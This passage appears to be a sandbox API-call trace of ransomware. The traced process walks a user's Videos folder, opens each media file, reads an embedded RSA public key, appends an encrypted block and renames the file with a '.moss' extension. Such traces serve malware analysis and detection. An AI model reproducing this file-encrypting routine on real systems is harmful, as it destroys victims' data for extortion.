ftLastAccessTime.dwLowDateTime=0xb9b76200, ftLastAccessTime.dwHighDateTime=0x1d5dc82, ftLastWriteTime.dwLowDateTime=0xb9b76200, ftLastWriteTime.dwHighDateTime=0x1d5dc82, nFileSizeHigh=0x0, nFileSizeLow=0x3ddd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="JDgNO7xPXb.flv", cAlternateFileName="JDGNO7~1.FLV")) returned 1 [0172.583] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\JDgNO7xPXb.flv") returned=".flv" [0172.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\JDgNO7xPXb.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\jdgno7xpxb.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.584] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=15837) returned 1 [0172.584] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.587] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3db7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.587] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.588] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3ddd, lpOverlapped=0x0) returned 1 [0172.588] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.588] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.589] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.589] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.589] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.589] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.589] GetLastError () returned 0x0 [0172.589] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.590] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.590] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.590] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.590] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.590] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.590] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3ddd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.590] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.590] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.590] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\JDgNO7xPXb.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\jdgno7xpxb.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\JDgNO7xPXb.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\jdgno7xpxb.flv.moss")) returned 1 [0172.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.591] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.591] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.592] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.592] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdf5eba0, ftCreationTime.dwHighDateTime=0x1d5e4e4, ftLastAccessTime.dwLowDateTime=0x40ce1590, ftLastAccessTime.dwHighDateTime=0x1d5e4bc, ftLastWriteTime.dwLowDateTime=0x40ce1590, ftLastWriteTime.dwHighDateTime=0x1d5e4bc, nFileSizeHigh=0x0, nFileSizeLow=0x5094, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KDXoQ.swf", cAlternateFileName="")) returned 1 [0172.592] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\KDXoQ.swf") returned=".swf" [0172.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\KDXoQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\kdxoq.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.592] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=20628) returned 1 [0172.593] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.597] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x506e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.597] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.597] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x5094, lpOverlapped=0x0) returned 1 [0172.597] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.597] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.598] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.598] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.598] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.598] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.598] GetLastError () returned 0x0 [0172.599] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.599] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.599] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.599] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.599] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.599] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5094, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.599] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.599] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.600] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\KDXoQ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\kdxoq.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\KDXoQ.swf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\kdxoq.swf.moss")) returned 1 [0172.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.600] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.600] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.601] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.601] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55d520, ftCreationTime.dwHighDateTime=0x1d5e1ab, ftLastAccessTime.dwLowDateTime=0xcc903fb0, ftLastAccessTime.dwHighDateTime=0x1d5d934, ftLastWriteTime.dwLowDateTime=0xcc903fb0, ftLastWriteTime.dwHighDateTime=0x1d5d934, nFileSizeHigh=0x0, nFileSizeLow=0x669c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MxqEFht CvSL8kxlj.avi", cAlternateFileName="MXQEFH~1.AVI")) returned 1 [0172.601] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\MxqEFht CvSL8kxlj.avi") returned=".avi" [0172.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\MxqEFht CvSL8kxlj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\mxqefht cvsl8kxlj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.602] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=26268) returned 1 [0172.602] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.605] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x6676, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.605] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.606] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x669c, lpOverlapped=0x0) returned 1 [0172.606] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.606] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.607] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.607] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.607] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.607] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.607] GetLastError () returned 0x0 [0172.607] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.607] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.607] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.607] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.607] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.608] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.608] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.608] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.608] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x669c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.608] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.609] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\MxqEFht CvSL8kxlj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\mxqefht cvsl8kxlj.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\MxqEFht CvSL8kxlj.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\mxqefht cvsl8kxlj.avi.moss")) returned 1 [0172.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.609] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.609] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.611] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.611] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c0cce60, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x25793040, ftLastAccessTime.dwHighDateTime=0x1d5df4e, ftLastWriteTime.dwLowDateTime=0x25793040, ftLastWriteTime.dwHighDateTime=0x1d5df4e, nFileSizeHigh=0x0, nFileSizeLow=0xf3bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OMgFdhXefqgaWTvC.flv", cAlternateFileName="OMGFDH~1.FLV")) returned 1 [0172.611] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\OMgFdhXefqgaWTvC.flv") returned=".flv" [0172.611] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\OMgFdhXefqgaWTvC.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\omgfdhxefqgawtvc.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.611] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=62397) returned 1 [0172.611] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.615] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf397, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.615] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.616] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xf3bd, lpOverlapped=0x0) returned 1 [0172.616] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.616] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ee98) returned 1 [0172.617] CryptCreateHash (in: hProv=0xd2ee98, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.617] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.618] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.618] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.618] GetLastError () returned 0x0 [0172.618] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.618] CryptReleaseContext (hProv=0xd2ee98, dwFlags=0x0) returned 1 [0172.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.618] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.618] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.618] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.618] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.618] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.619] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xf3bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.619] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.619] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0172.619] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\OMgFdhXefqgaWTvC.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\omgfdhxefqgawtvc.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\OMgFdhXefqgaWTvC.flv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\omgfdhxefqgawtvc.flv.moss")) returned 1 [0172.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0172.620] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.620] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.622] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.622] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976d05c0, ftCreationTime.dwHighDateTime=0x1d5e3e8, ftLastAccessTime.dwLowDateTime=0xa0cce790, ftLastAccessTime.dwHighDateTime=0x1d5e3fa, ftLastWriteTime.dwLowDateTime=0xa0cce790, ftLastWriteTime.dwHighDateTime=0x1d5e3fa, nFileSizeHigh=0x0, nFileSizeLow=0x78be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="se6dcbCoGQ56.flv", cAlternateFileName="SE6DCB~1.FLV")) returned 1 [0172.622] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\se6dcbCoGQ56.flv") returned=".flv" [0172.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\V4xTSO7L1q6Ip\\O3UCSFjw\\se6dcbCoGQ56.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\v4xtso7l1q6ip\\o3ucsfjw\\se6dcbcogq56.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.622] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=30910) returned 1 [0172.622] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.625] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x7898, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.625] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, 